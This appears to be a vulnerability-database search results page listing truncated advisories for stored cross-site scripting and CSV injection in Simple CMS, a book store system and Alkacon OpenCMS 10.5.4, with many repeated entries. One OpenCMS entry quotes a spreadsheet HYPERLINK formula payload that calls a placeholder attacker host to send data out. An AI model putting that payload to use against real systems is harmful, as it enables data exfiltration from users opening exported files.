17 matches found
CVE-2021-47917
CVE-2021-47917 affects Simple CMS 2.1. It describes a persistent cross-site scripting (XSS) vulnerability in user input parameters that attackers can inject via the newUser and editUser modules. The injected scripts can execute on the user list preview, potentially leading to session hijacking an...
PT-2026-5562
Simple CMS 2.1 contains a persistent cross-site scripting vulnerability in user input parameters that allows remote attackers to inject malicious script code. Attackers can exploit the newUser and editUser modules to inject persistent scripts that execute on user list preview, potentially leading...
EUVD-2019-3485
Malware in sbrugna...
EUVD-2019-3484
Malware in sbrugna...
CVE-2022-45215
A cross-site scripting XSS vulnerability in Book Store Management System v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter under the Add New System User module...
CVE-2019-11819
Alkacon OpenCMS v10.5.4 and before is affected by CSV aka Excel Macro Injection in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp via the First Name or Last Name...
GHSA-C8J6-GQQ8-4PRJ Alkacon OpenCMS XSS via New User module
Alkacon OpenCMS v10.5.4 and before is affected by stored cross site scripting XSS in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp. This allows an attacker to insert arbitrary JavaScript as user input First Name or Last Name, which will be executed whenever the affected...
Alkacon OpenCMS XSS via New User module
Alkacon OpenCMS v10.5.4 and before is affected by stored cross site scripting XSS in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp. This allows an attacker to insert arbitrary JavaScript as user input First Name or Last Name, which will be executed whenever the affected...
Alkacon OpenCMS CSV Injection via New User module
Alkacon OpenCMS v10.5.4 and before is affected by CSV aka Excel Macro Injection in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp via the First Name or Last Name...
GHSA-Q693-V7QF-P4XJ Alkacon OpenCMS CSV Injection via New User module
Alkacon OpenCMS v10.5.4 and before is affected by CSV aka Excel Macro Injection in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp via the First Name or Last Name...
OpenCMS 10.5.4 CSV Injection
Description: OpenCMS v10.5.4 and before is vulnerable to CSV injection in New User module for parameter First Name and Last Name Impacted URL is http://yourwebserverip/opencms/system/workplace/admin/accounts/usernew.jsp Payload used is '=HYPERLINK"http://attackerip:port/GiveMeSomeData","IAmSafe"'...
OpenCMS 10.5.4 Cross Site Scripting
Description: OpenCMS v10.5.4 and before is vulnerable to cross site scripting in New User module for parameter First Name and Last Name Impacted URL is http://yourwebserverip/opencms/system/workplace/admin/accounts/usernew.jsp Payload used in PoC is...
CVE-2019-11819
Alkacon OpenCMS v10.5.4 and before is affected by CSV aka Excel Macro Injection in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp via the First Name or Last Name...
CVE-2019-11818
Alkacon OpenCMS v10.5.4 and before is affected by stored cross site scripting XSS in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp. This allows an attacker to insert arbitrary JavaScript as user input First Name or Last Name, which will be executed whenever the affected...
CVE-2019-11818
Alkacon OpenCMS v10.5.4 and before is affected by stored cross site scripting XSS in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp. This allows an attacker to insert arbitrary JavaScript as user input First Name or Last Name, which will be executed whenever the affected...
CVE-2019-11819
Alkacon OpenCMS v10.5.4 and before is affected by CSV aka Excel Macro Injection in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp via the First Name or Last Name...
CVE-2019-11818
Alkacon OpenCMS v10.5.4 and before is affected by stored cross site scripting XSS in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp. This allows an attacker to insert arbitrary JavaScript as user input First Name or Last Name, which will be executed whenever the affected...